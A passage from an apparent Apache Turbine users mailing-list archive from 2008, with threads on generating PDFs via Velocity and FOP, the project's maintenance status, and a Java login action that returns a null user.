Jan 2008 05:58:54 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO dmz-scan-01.unycom.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Jan 2008 13:58:41 +0000 Received: from dmz-scan-01.unycom.com (localhost [161.129.204.104]) by localhost.unycom.com (Postfix) with ESMTP id E5AEC90C510 for <[email protected]>; Mon, 21 Jan 2008 14:58:20 +0100 (CET) Received: from uny-srv-ex.unycom.com (uny-srv-ex.unycom.com [161.129.204.104])by dmz-scan-01.unycom.com (Postfix) with ESMTP id D5C3D90C50Ffor <[email protected]>; Mon, 21 Jan 2008 14:58:20 +0100 (CET) X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Subject: AW: AW: Using Turbine's tools for assembling PDF output (using FOP):how to? Date: Mon, 21 Jan 2008 14:58:32 +0100 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: AW: Using Turbine's tools for assembling PDF output (using FOP):how to? Thread-Index: AchawqRTibR7XRIQQm6KQNqquuwilwBai7/w References: <[email protected]> <[email protected]> From: "Alexander Zimmer" <[email protected]> To: "Turbine Users List" <[email protected]> X-imss-version: 2.049 X-imss-result: Passed X-imss-scanInfo: M:P L:E SM:0 X-imss-tmaseResult: TT:0 TS:0.0000 TC:00 TRN:0 TV:5.0.1023(15680.003) X-imss-scores: Clean:91.45459 C:2 M:3 S:5 R:5 X-imss-settings: Baseline:1 C:1 M:1 S:1 R:1 (0.0000 0.0000) X-Virus-Checked: Checked by ClamAV on apache.org This was exactly the hint I was looking for! Thanx a lot, I got it to = work with no [email protected]. @Tony Oslund: since the deadline is this week I will not be able to = switch away from FOP. But I definitely will have a look at pd4ml, I just = peeked a little inside the examples and it seems promising ... Besides, your point with asynchronous generation is right, however, in = my case (again, the close deadline make my skin rise with goose bumps) = I'm better off with a synchronous solution. If performance should be a = problem, I will offer the customer to switch to asynchr. generation, but = beforehand I will have to spend a few thoughts on this (how to notifiy = when the PDF is complete, ...). Thank you all for your help! Cheers, Alex -----Urspr=FCngliche Nachricht----- Von: Thomas Vandahl [mailto:[email protected]]=20 Gesendet: Samstag, 19. J=E4nner 2008 18:42 An: Turbine Users List Betreff: Re: AW: Using Turbine's tools for assembling PDF output (using = FOP):how to? Alexander Zimmer wrote: > How can I use template functionality? The problem involved are: > 1. I want to use the Velocity engine and capture its output in a = String/ByteArray. The output will be a valid FO file. > 2. I want to be able to use all (at least: some) pull tools Turbine = provides for screen templates > I think that I've solved the other problems (how to do the streaming, = how to convert into PDF, ...). > I try to dive into the VelocityOnlyLayout (as Peter Courcoux pointed = out), but if you have additional clues for me, I would be very happy to = hear from you! You have TurbineVelocity at your disposal.=20 TurbineVelocity.handleRequest(Context context, String template) is=20 probably what you want. The service is used by Turbine itself so the=20 Velocity engine used is completely configured and ready to use. The service will provide you with a new context=20 (TurbineVelocity.getContext(RunData data)) which is already=20 pre-populated with all the pull tools you configured, but you can also=20 pass it an existing, pre-populated context. Don't forget to call TurbineVelocity.requestFinished() when you're done. Bye, Thomas. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jan 21 22:45:16 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40752 invoked from network); 21 Jan 2008 22:45:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jan 2008 22:45:16 -0000 Received: (qmail 58600 invoked by uid 500); 21 Jan 2008 22:45:06 -0000 Delivered-To: [email protected] Received: (qmail 58588 invoked by uid 500); 21 Jan 2008 22:45:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 58579 invoked by uid 99); 21 Jan 2008 22:45:06 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Jan 2008 14:45:06 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.bevcomm.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Jan 2008 22:44:52 +0000 Received: from SIMON (ip124.ip241.bevcomm.net [161.129.204.104]) by mail.bevcomm.net (8.13.1/8.13.1) with SMTP id m0LMifW8021599 for <[email protected]>; Mon, 21 Jan 2008 16:44:42 -0600 Message-ID: <9A39DE062FD9412984F02A02CF1CA941@SIMON> From: "Tony Oslund" <[email protected]> To: "Turbine Users List" <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Subject: Re: AW: Using Turbine's tools for assembling PDF output (using FOP):how to? Date: Mon, 21 Jan 2008 16:46:32 -0600 MIME-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1"; reply-type=original Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Windows Mail 6.0.6000.16480 X-MimeOLE: Produced By Microsoft MimeOLE V6.0.6000.16545 X-Virus-Checked: Checked by ClamAV on apache.org One trick that I have used (for notifying pdf completion) is to embed a hidden iframe within the parent web form... This iframe references a seperate Velocity form whose sole purpose in life is to check for completion of the generation by simply refreshing the hidden contents of the iframe once every few seconds (during the refresh the iframe Turbine doBuildTemplate code polls the status of the generation). Once generation is complete the iframe Turbine doBuildTemplate code loads a different flag into the context that specifies that different java script should be included in the form. This different scripting signals the parent form that it should refresh itself once generation is complete. It sounds complex, but is actually a fairly small amount of javascript combined with some very basic Velocity form logic (yes I know that I am off topic). The reason for putting the polling in the iframe is that it avoids unnecessary refreshes to the parent form which results in a smoother more pleasant experience for the user. Also, the asynchronous generation (in my case) is just a java process running as a Linux crontab process that checks for logged requests, generates the report, and flags the request as complete. The nice thing about this is that the process can exist on a server that is entirely seperate from the app server. Best of luck ----- Original Message ----- From: "Alexander Zimmer" <[email protected]> To: "Turbine Users List" <[email protected]> Sent: Monday, January 21, 2008 7:58 AM Subject: AW: AW: Using Turbine's tools for assembling PDF output (using FOP):how to? > This was exactly the hint I was looking for! Thanx a lot, I got it to work > with no [email protected]. > > @Tony Oslund: since the deadline is this week I will not be able to switch > away from FOP. But I definitely will have a look at pd4ml, I just peeked a > little inside the examples and it seems promising ... > Besides, your point with asynchronous generation is right, however, in my > case (again, the close deadline make my skin rise with goose bumps) I'm > better off with a synchronous solution. If performance should be a > problem, I will offer the customer to switch to asynchr. generation, but > beforehand I will have to spend a few thoughts on this (how to notifiy > when the PDF is complete, ...). > > Thank you all for your help! > > Cheers, > Alex > > -----Ursprüngliche Nachricht----- > Von: Thomas Vandahl [mailto:[email protected]] > Gesendet: Samstag, 19. Jänner 2008 18:42 > An: Turbine Users List > Betreff: Re: AW: Using Turbine's tools for assembling PDF output (using > FOP):how to? > > Alexander Zimmer wrote: >> How can I use template functionality? The problem involved are: >> 1. I want to use the Velocity engine and capture its output in a >> String/ByteArray. The output will be a valid FO file. >> 2. I want to be able to use all (at least: some) pull tools Turbine >> provides for screen templates >> I think that I've solved the other problems (how to do the streaming, how >> to convert into PDF, ...). >> I try to dive into the VelocityOnlyLayout (as Peter Courcoux pointed >> out), but if you have additional clues for me, I would be very happy to >> hear from you! > > You have TurbineVelocity at your disposal. > TurbineVelocity.handleRequest(Context context, String template) is > probably what you want. The service is used by Turbine itself so the > Velocity engine used is completely configured and ready to use. > > The service will provide you with a new context > (TurbineVelocity.getContext(RunData data)) which is already > pre-populated with all the pull tools you configured, but you can also > pass it an existing, pre-populated context. > > Don't forget to call TurbineVelocity.requestFinished() when you're done. > > > Bye, Thomas. > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jan 30 22:10:20 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81825 invoked from network); 30 Jan 2008 22:10:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Jan 2008 22:10:20 -0000 Received: (qmail 50493 invoked by uid 500); 30 Jan 2008 22:10:11 -0000 Delivered-To: [email protected] Received: (qmail 50479 invoked by uid 500); 30 Jan 2008 22:10:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 50470 invoked by uid 99); 30 Jan 2008 22:10:10 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 Jan 2008 14:10:10 -0800 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO nihrelayxway3.hub.nih.gov) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 Jan 2008 22:09:56 +0000 X-IronPortListener: NIH_Relay X-SBRS: None X-IronPort-AV: E=Sophos;i="4.25,281,1199682000"; d="scan'208";a="299490986" Received: from unknown (HELO clind3.nlm.nih.gov) ([161.129.204.104]) by nihrelayxway3.hub.nih.gov with ESMTP; 30 Jan 2008 17:09:50 -0500 Message-ID: <[email protected]> Date: Wed, 30 Jan 2008 17:09:48 -0500 From: Nick Ide <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20071031) MIME-Version: 1.0 To: [email protected] Subject: what is current status and likely future of turbine ? Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org We have built several projects in the past using turbine. We are beginning a new project and trying to decide whether to use turbine or try something else. We are a little concerned that turbine is dead or dying from lack of community. My questions: 1. When will turbine 2.3.3 be released ? 2. Is anybody working on that release ? 3. Is there any active work on the turbine code base ? 4. If there is no work, is that because it all just works or because everybody has abandoned turbine in favor of something else ? 5. Probably asking the crowd since the people who voted with their feet have stopped listening, but what do you suppose people have adopted to use instead of turbine ? is it VelocityStruts ? is it Spring ? Others ? -Nick --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jan 30 22:59:18 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4325 invoked from network); 30 Jan 2008 22:59:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Jan 2008 22:59:18 -0000 Received: (qmail 19607 invoked by uid 500); 30 Jan 2008 22:59:09 -0000 Delivered-To: [email protected] Received: (qmail 19373 invoked by uid 500); 30 Jan 2008 22:59:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 19364 invoked by uid 99); 30 Jan 2008 22:59:08 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 Jan 2008 14:59:08 -0800 X-ASF-Spam-Status: No, hits=0.3 required=10.0 tests=SPF_PASS,WHOIS_DMNBYPROXY X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO barge.anchor.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 Jan 2008 22:58:51 +0000 Received: from [161.129.204.104] (dsl-58-6-32-215.nsw.westnet.com.au [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by barge.anchor.net.au (Postfix) with ESMTP id D262F10103 for <[email protected]>; Thu, 31 Jan 2008 09:58:46 +1100 (EST) Message-ID: <[email protected]> Date: Thu, 31 Jan 2008 09:58:30 +1100 From: Scott Eade <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20071031) MIME-Version: 1.0 To: Turbine Users List <[email protected]> Subject: Re: what is current status and likely future of turbine ? References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Nick Ide wrote: > > We have built several projects in the past using turbine. > We are beginning a new project and trying to decide whether to > use turbine or try something else. We are a little concerned that > turbine is dead or dying from lack of community. > > My questions: > > 1. When will turbine 2.3.3 be released ? We hope to release 2.3.3 real soon now. The blocker is that we want to use Torque 3.3 and we want to wait another week before voting on that so that people will have had a chance to provide feedback on it's RC-3 release. I don't believe we have any plans for a 2.3.3 RC release - straight to final would be my suggestion. > 2. Is anybody working on that release ? Thomas V. and myself are working on this as time permits. > 3. Is there any active work on the turbine code base ? As time permits we (and this includes Siegfried and others) are working on tidying up the trunk in order to get to a 2.4 release, but progress is indeed very slow. > 4. If there is no work, is that because it all just works or because > everybody has abandoned turbine in favor of something else ? It is probably fair to say that many have moved to other frameworks that are more in vogue, however there are plenty of people that have existing applications that need to be maintained into the future so support for and slow forward progress of turbine should still occur. Your point about stability may also be true to a certain extent. > 5. Probably asking the crowd since the people who voted with their > feet have stopped listening, but what do you suppose > people have adopted to use instead of turbine ? is it VelocityStruts > ? is it Spring ? Others ? There will be no short answers to this question. There are plenty of interesting frameworks out there with various pros and cons and certainly many of them have a lot more momentum than turbine. Of course the framework that best suits you will be different from the one that best suits me or anyone else. I am a big fan of ExtJS (http://extjs.com/) so I'm going to favour solution that integrates nicely with that. Mucking about with JavaScript all the time is a PITA so I may take a look at GWT with gwt-ext (http://code.google.com/p/gwt-ext/) some time. Tapestry 5 (http://tapestry.apache.org/tapestry5/) is looking fairly interesting, though a 1.0 release may still be a little while away. But neither of these are exactly main stream and I certainly have not looked to see if these support the range of services that are available with turbine. I am certainly interested to see responses from others, with justifications (and why various alternatives were ruled out). Another option to consider is diving in and helping with turbine. It sounds like you have a long term interest in the continued support of turbine so why not invest a little time in keeping it moving forward. After a couple of decent patches we are usually fairly happy to vote on commit access. Scott --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jan 30 23:10:31 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8441 invoked from network); 30 Jan 2008 23:10:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Jan 2008 23:10:31 -0000 Received: (qmail 38063 invoked by uid 500); 30 Jan 2008 23:10:21 -0000 Delivered-To: [email protected] Received: (qmail 38040 invoked by uid 500); 30 Jan 2008 23:10:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 38031 invoked by uid 99); 30 Jan 2008 23:10:21 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 Jan 2008 15:10:21 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO lifemail2.lifeinnovations.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 30 Jan 2008 23:10:08 +0000 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: what is current status and likely future of turbine ? X-MimeOLE: Produced By Microsoft Exchange V6.5 Date: Wed, 30 Jan 2008 17:09:59 -0600 Message-ID: <[email protected]> In-Reply-To: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: what is current status and likely future of turbine ? thread-index: AchjjOheBwnldhX6QfC5oawdQjPRAwAA5y7Q From: "Tony Oslund" <[email protected]> To: "Turbine Users List" <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Adoption of technology should be based upon things such as need, cost, ease of use, maintainability, and availability of resources, past success, amongst others. =20 I find that Turbine in conjunction with Velocity serves these needs very well. I have also wondered at times why this site is very quiet, and then I realize that I rarely need to post questions, since there is the archive.=20 It would be a shame to see a great technology fall by the wayside simply because it has been successful, people learn it quickly, the community has been supportive, and because others make more noise. You used the term "several projects", which probably means several successful projects. Perhaps more noise is the answer... -----Original Message----- From: Nick Ide [mailto:[email protected]]=20 Sent: Wednesday, January 30, 2008 4:10 PM To: [email protected] Subject: what is current status and likely future of turbine ?=20 We have built several projects in the past using turbine. We are beginning a new project and trying to decide whether to use turbine or try something else.=20 We are a little concerned that turbine is dead or dying from lack of=20 community. My questions: 1. When will turbine 2.3.3 be released ? 2. Is anybody working on that release ? 3. Is there any active work on the turbine code base ? 4. If there is no work, is that because it all just works or because=20 everybody has abandoned turbine in favor of something else ? 5. Probably asking the crowd since the people who voted with their feet=20 have stopped listening, but what do you suppose people have adopted to use instead of turbine ? is it VelocityStruts ? is it Spring ? Others ? -Nick --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 31 13:35:46 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89000 invoked from network); 31 Jan 2008 13:35:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 13:35:46 -0000 Received: (qmail 90686 invoked by uid 500); 31 Jan 2008 13:35:36 -0000 Delivered-To: [email protected] Received: (qmail 90670 invoked by uid 500); 31 Jan 2008 13:35:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 90661 invoked by uid 99); 31 Jan 2008 13:35:36 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 05:35:36 -0800 X-ASF-Spam-Status: No, hits=-2.0 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO ndmsbar04.ndc.nasa.gov) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 13:35:20 +0000 Received: from ndmsxgw04.ndc.nasa.gov (ndmsxgw04.ndc.nasa.gov [161.129.204.104]) by ndmsbar04.ndc.nasa.gov (Spam Firewall) with ESMTP id 4F4C9418659 for <[email protected]>; Thu, 31 Jan 2008 07:35:12 -0600 (CST) Received: from ndmsxgw04.ndc.nasa.gov (ndmsxgw04.ndc.nasa.gov [161.129.204.104]) by ndmsbar04.ndc.nasa.gov with ESMTP id oXaUqpyezN5s9AR9 for <[email protected]>; Thu, 31 Jan 2008 07:35:12 -0600 (CST) Received: from NDMSEVS37B.ndc.nasa.gov ([161.129.204.104]) by ndmsxgw04.ndc.nasa.gov with Microsoft SMTPSVC(262)914-4166); Thu, 31 Jan 2008 07:35:12 -0600 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C8640E.1AD71A6A" Subject: user is nulled out on login attempt Date: Thu, 31 Jan 2008 07:35:12 -0600 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: user is nulled out on login attempt Thread-Index: AchkDhrXH0jhQP8VTaim4lnsQQc71A== From: "Shaw, Nathan (HQ-LD070)[InDyne, Inc]" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 31 Jan 2008 13:35:12.0081 (UTC) FILETIME=[1ABA8410:01C8640E] X-Virus-Checked: Checked by ClamAV on apache.org ------_=_NextPart_001_01C8640E.1AD71A6A Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi all, I am writing my own login action and need to be able to check to see if = a user is already logged in when the action is called. If they are, I = want to skip the login stuff to preserve their session. However, every = single time that the login action is called, the User object is coming = back NULL. Here is a code snippet. Does anyone have any idea WHY the user is coming = back NULL? I assume something is happening in Turbine somewhere that = wipes the User on a login attempt or something? public class OutageCalLoginUser extends LoginUser { public void doPerform( RunData data, Context context) throws Exception { String uname ; String passwd ; =20 System.out.println("doPerform(data, context)"); if ( data.getUserFromSession() =3D=3D null ){ System.out.println("user from session is null"); }else{ System.out.println("user from session is NOT null"); } =20 if(data.getUser() =3D=3D null){ System.out.println("user is null"); }else{ System.out.println("user is NOT null"); if(data.getUser().hasLoggedIn()){ System.out.println("user is logged in"); }else{ System.out.println("user is NOT logged in"); } } =20 =20 if((data.getUser() =3D=3D null) || (data.getUser() !=3D null && = data.getUser().hasLoggedIn() =3D=3D false)){ =09 try { SymEncDec enc =3D SymEncDec.getInstance(); =20 // Username/password =3D username/pswd coming through front door. // User coming from elsewhere will have neither username nor = pswd. String username =3D data.getParameters().get("username"); String pswd =3D data.getParameters().get("password"); =09 // If username exists, user came in the front door. if (username !=3D null && username.length()>0) { uname =3D username; passwd =3D pswd; }else { uname =3D "guest"; String encryptedPasswd =3D = TurbineResources.getString("guest.credential"); passwd =3D encryptedPasswd; //enc.decodeBase64Decrypt(encryptedPasswd); } // Log the user in doLogin(data, uname, passwd); =20 try { Utils.getUserID(data); } catch (NullPointerException npe) { throw new TurbineSecurityException("Bad username or password, I = say!"); } =09 } catch ( TurbineSecurityException se ) { badUserOrPassword(se, data); } catch (Exception e) { throw new PortalVelocityException(e.getMessage()=3D=3Dnull?": = "+e.getMessage():e.getMessage(), e.getCause()=3D=3Dnull?e:e.getCause(), data); } =20 } } }=20 ------_=_NextPart_001_01C8640E.1AD71A6A-- From [email protected] Thu Jan 31 13:54:23 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96394 invoked from network); 31 Jan 2008 13:54:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 13:54:23 -0000 Received: (qmail 22174 invoked by uid 500); 31 Jan 2008 13:54:14 -0000 Delivered-To: [email protected] Received: (qmail 22161 invoked by uid 500); 31 Jan 2008 13:54:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 22152 invoked by uid 99); 31 Jan 2008 13:54:13 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 05:54:13 -0800 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO relay1.mail.uk.clara.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 13:53:44 +0000 Received: from smtp.clara.net ([161.129.204.104]) by relay1.mail.uk.clara.net with esmtp (Exim 4.62) (envelope-from <[email protected]>) id 1JKZrQ-0008UK-D7 for [email protected]; Thu, 31 Jan 2008 13:53:48 +0000 Received: from pjcourcouxdsl.claranet.co.uk ([161.129.204.104] helo=earth.courcoux.biz) by smtp.clara.net with esmtp (Exim 4.46) id 1JKZrQ-000LvR-68 for [email protected]; Thu, 31 Jan 2008 13:53:48 +0000 Received: from localhost (localhost [161.129.204.104]) by earth.courcoux.biz (Postfix) with ESMTP id B4EC61D8C4F for <[email protected]>; Thu, 31 Jan 2008 14:44:33 +0000 (GMT) X-Virus-Scanned: [email protected] Received: from earth.courcoux.biz ([161.129.204.104]) by localhost (earth.courcoux.biz [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id TMiJR6bbT3gS for <[email protected]>; Thu, 31 Jan 2008 14:44:30 +0000 (GMT) Received: from [161.129.204.104] (localhost [161.129.204.104]) by earth.courcoux.biz (Postfix) with ESMTP id 975401D8BFE for <[email protected]>; Thu, 31 Jan 2008 14:44:30 +0000 (GMT) Message-ID: <[email protected]> Date: Thu, 31 Jan 2008 13:56:16 +0000 From: Peter Courcoux <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070728) MIME-Version: 1.0 To: Turbine Users List <[email protected]> Subject: Re: user is nulled out on login attempt References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hi Nathan, I assume that you are using Turbine 2.3.x. I may be wrong and I don't have the code to hand at the moment, but I suspect that you might need to look at the SessionValidator which is called before you get to the login page. The SessionValidator is pluggable if you need to modify it. I hope that this helps. Regards, Peter Shaw, Nathan (HQ-LD070)[InDyne, Inc] wrote: > Hi all, > > I am writing my own login action and need to be able to check to see if a user is already logged in when the action is called. If they are, I want to skip the login stuff to preserve their session. However, every single time that the login action is called, the User object is coming back NULL. > > Here is a code snippet. Does anyone have any idea WHY the user is coming back NULL? I assume something is happening in Turbine somewhere that wipes the User on a login attempt or something? > > > public class OutageCalLoginUser extends LoginUser { > > public void doPerform( RunData data, Context context) throws Exception { > String uname ; > String passwd ; > > System.out.println("doPerform(data, context)"); > if ( data.getUserFromSession() == null ){ > System.out.println("user from session is null"); > }else{ > System.out.println("user from session is NOT null"); > } > > if(data.getUser() == null){ > System.out.println("user is null"); > }else{ > System.out.println("user is NOT null"); > if(data.getUser().hasLoggedIn()){ > System.out.println("user is logged in"); > }else{ > System.out.println("user is NOT logged in"); > } > } > > > if((data.getUser() == null) || (data.getUser() != null && data.getUser().hasLoggedIn() == false)){ > > try { > SymEncDec enc = SymEncDec.getInstance(); > > // Username/password = username/pswd coming through front door. > // User coming from elsewhere will have neither username nor pswd. > String username = data.getParameters().get("username"); > String pswd = data.getParameters().get("password"); > > // If username exists, user came in the front door. > if (username != null && username.length()>0) { > uname = username; > passwd = pswd; > }else { > uname = "guest"; > String encryptedPasswd = TurbineResources.getString("guest.credential"); > passwd = encryptedPasswd; > //enc.decodeBase64Decrypt(encryptedPasswd); > } > // Log the user in > doLogin(data, uname, passwd); > > try { > Utils.getUserID(data); > } > catch (NullPointerException npe) { > throw new TurbineSecurityException("Bad username or password, I say!"); > } > > } > catch ( TurbineSecurityException se ) { > badUserOrPassword(se, data); > } > catch (Exception e) { > throw new PortalVelocityException(e.getMessage()==null?": "+e.getMessage():e.getMessage(), > e.getCause()==null?e:e.getCause(), data); > } > > } > } > > } > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 31 14:21:06 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6125 invoked from network); 31 Jan 2008 14:21:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 14:21:06 -0000 Received: (qmail 62235 invoked by uid 500); 31 Jan 2008 14:20:57 -0000 Delivered-To: [email protected] Received: (qmail 62211 invoked by uid 500); 31 Jan 2008 14:20:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 62201 invoked by uid 99); 31 Jan 2008 14:20:57 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 06:20:57 -0800 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO ndmsbar03.ndc.nasa.gov) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 14:20:40 +0000 Received: from ndmsxgw04.ndc.nasa.gov (ndmsxgw04.ndc.nasa.gov [161.129.204.104]) by 